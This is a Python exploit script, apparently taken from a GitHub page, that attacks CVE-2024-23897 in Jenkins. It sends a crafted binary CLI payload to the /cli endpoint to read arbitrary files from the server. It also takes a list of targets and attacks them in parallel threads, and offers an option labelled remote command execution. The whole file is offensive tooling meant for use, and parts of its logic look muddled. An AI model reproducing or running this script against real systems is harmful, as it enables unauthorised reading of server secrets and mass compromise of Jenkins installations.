/
CVE-2024-23897.py
128 lines (109 loc) · 8.23 KB
/
CVE-2024-23897.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
import requests
import argparse
import uuid
import urllib.parse
import os
from sys import stdout
from colorama import Fore, init
import concurrent.futures
FR = Fore.RED
FY = Fore.YELLOW
FG = Fore.GREEN
FW = Fore.WHITE
init(autoreset=True)
session = requests.Session()
def clear():
os.system('clear' if os.name == 'posix' else 'cls')
def banners():
clear()
stdout.write(" \n")
stdout.write(""+Fore.LIGHTRED_EX +"██╗ ███████╗ █████╗ ██████╗ ██████╗ ██████╗ ██████╗███████╗\n")
stdout.write(""+Fore.LIGHTRED_EX +"██║ ██╔════╝██╔══██╗██╔══██╗ ╚════██╗ ██╔══██╗██╔════╝██╔════╝\n")
stdout.write(""+Fore.LIGHTRED_EX +"██║ █████╗ ███████║██║ ██║█████╗ █████╔╝█████╗██████╔╝██║ █████╗ \n")
stdout.write(""+Fore.LIGHTRED_EX +"██║ ██╔══╝ ██╔══██║██║ ██║╚════╝██╔═══╝ ╚════╝██╔══██╗██║ ██╔══╝\n")
stdout.write(""+Fore.LIGHTRED_EX +"███████╗███████╗██║ ██║██████╔╝ ███████╗ ██║ ██║╚██████╗███████╗\n")
stdout.write(""+Fore.LIGHTRED_EX +"╚══════╝╚══════╝╚═╝ ╚═╝╚═════╝ ╚══════╝ ╚═╝ ╚═╝ ╚═════╝╚══════╝\n")
stdout.write(""+Fore.YELLOW +"═════════════╦═════════════════════════════════╦══════════════════════════════\n")
stdout.write(""+Fore.YELLOW +"╔════════════╩═════════════════════════════════╩═════════════════════════════╗\n")
stdout.write(""+Fore.YELLOW +"║ \x1b[38;2;255;20;147m• "+Fore.GREEN+"AUTHOR "+Fore.RED+" |"+Fore.LIGHTWHITE_EX+" PARI MALAM "+Fore.YELLOW+"║\n")
stdout.write(""+Fore.YELLOW +"╔════════════════════════════════════════════════════════════════════════════╝\n")
stdout.write(""+Fore.YELLOW +"║ \x1b[38;2;255;20;147m• "+Fore.GREEN+"GITHUB "+Fore.RED+" |"+Fore.LIGHTWHITE_EX+" GITHUB.COM/THATNOTEASY "+Fore.YELLOW+"║\n")
stdout.write(""+Fore.YELLOW +"╚════════════════════════════════════════════════════════════════════════════╝\n")
print(f"{Fore.YELLOW}[CVE-2024-23897] - {Fore.GREEN}Jenkins Arbitrary File Read Vulnerability Leading to RCE\n")
banners()
class CVE_2024_23897:
def __init__(self, output_file=None, command=None) -> None:
self.output_file = output_file
self.command = command
self.urls = None
self.ips = None
def prefix_scheme(self, url):
if not url.startswith('http://') and not url.startswith('https://'):
url = 'http://' + url
return url
def donlod(self, target_info, uuid_str):
try:
headers = {"Session": uuid_str, "Side": "download"}
response = session.post(f"{target_info.scheme}://{target_info.netloc}/cli?remoting=false", headers=headers)
print(f"{FY}[LEAD-2-RCE]: {FW}{target_info.netloc} {FR}| {FG}{response.content}{Fore.RESET}")
print(f"{FR}.++===============================================================================================================++.{Fore.RESET}")
self.save_response(response.content)
except Exception as e:
print(f"{FY}[LEAD-2-RCE]: {FW}{target_info.netloc} {FR}| {FR}Not Vulnerable :P{Fore.RESET}")
def oplod(self, target_info, uuid_str, data):
try:
headers = {"Session": uuid_str, "Side": "upload", "Content-type": "application/octet-stream"}
response = session.post(f"{target_info.scheme}://{target_info.netloc}/cli?remoting=false", headers=headers, data=data)
print(f"{FY}[LEAD-2-RCE]: {FW}{target_info.netloc} {FR}| {FG}{response.content}")
print(f"{FR}.++===============================================================================================================++.{Fore.RESET}")
self.save_response(response.content)
except Exception as e:
print(f"{FY}[LEAD-2-RCE]: {FW}{target_info.netloc} {FR}| {FR}Not Vulnerable :P{Fore.RESET}")
def save_response(self, content):
if self.output_file:
with open(self.output_file, 'a') as f:
f.write(content.decode() + '\n')
def execute_command(self, target_info, uuid_str):
try:
headers = {"Session": uuid_str, "Side": "command"}
response = session.post(f"{target_info.scheme}://{target_info.netloc}/cli?remoting=false", headers=headers, data=self.command.encode())
print(f"{FY}[LEAD-2-RCE]: {FW}{target_info.netloc} {FR}| {FG}{response.content}")
print(f"{FR}.++===============================================================================================================++.{Fore.RESET}")
self.save_response(response.content)
except Exception as e:
print(f"{FY}[LEAD-2-RCE]: {FW}{target_info.netloc} {FR}| {FR}Not Vulnerable :P{Fore.RESET}")
def beduk(self, target_url, file_path):
formatted_url = self.prefix_scheme(target_url)
target_info = urllib.parse.urlparse(formatted_url)
uuid_str = str(uuid.uuid4())
data = b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@' + file_path.encode() + b'\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'
self.oplod(target_info, uuid_str, data)
self.donlod(target_info, uuid_str)
if self.command:
self.execute_command(target_info, uuid_str)
def find_until_die(self, file_path, num_threads):
with open(file_path, 'r') as file:
targets = [self.prefix_scheme(line.strip()) for line in file.readlines()]
with concurrent.futures.ThreadPoolExecutor(max_workers=num_threads) as executor:
future_to_url = {executor.submit(self.beduk, target, file_path): target for target in targets}
for future in concurrent.futures.as_completed(future_to_url):
url = future_to_url[future]
try:
future.result()
except Exception as exc:
print(f"{FR}Error processing {url}: {exc}")
def main():
parser = argparse.ArgumentParser(description='Exploit script for CVE-2024-23897.')
parser.add_argument('-u', '--url', help='Single target URL.')
parser.add_argument('-f', '--filename', required=True, help='File containing list of IPs or URLs.')
parser.add_argument('-t', '--threads', type=int, default=5, help='Number of threads for concurrent execution. Default is 5.')
parser.add_argument('-o', '--output', help='Output file to save successful responses.')
parser.add_argument('-c', '--command', help='Command to execute on the target system.')
args = parser.parse_args()
exploit = CVE_2024_23897(output_file=args.output, command=args.command)
if args.url:
exploit.beduk(args.url, args.filename)
else:
exploit.find_until_die(args.filename, args.threads)
if __name__ == "__main__":
main()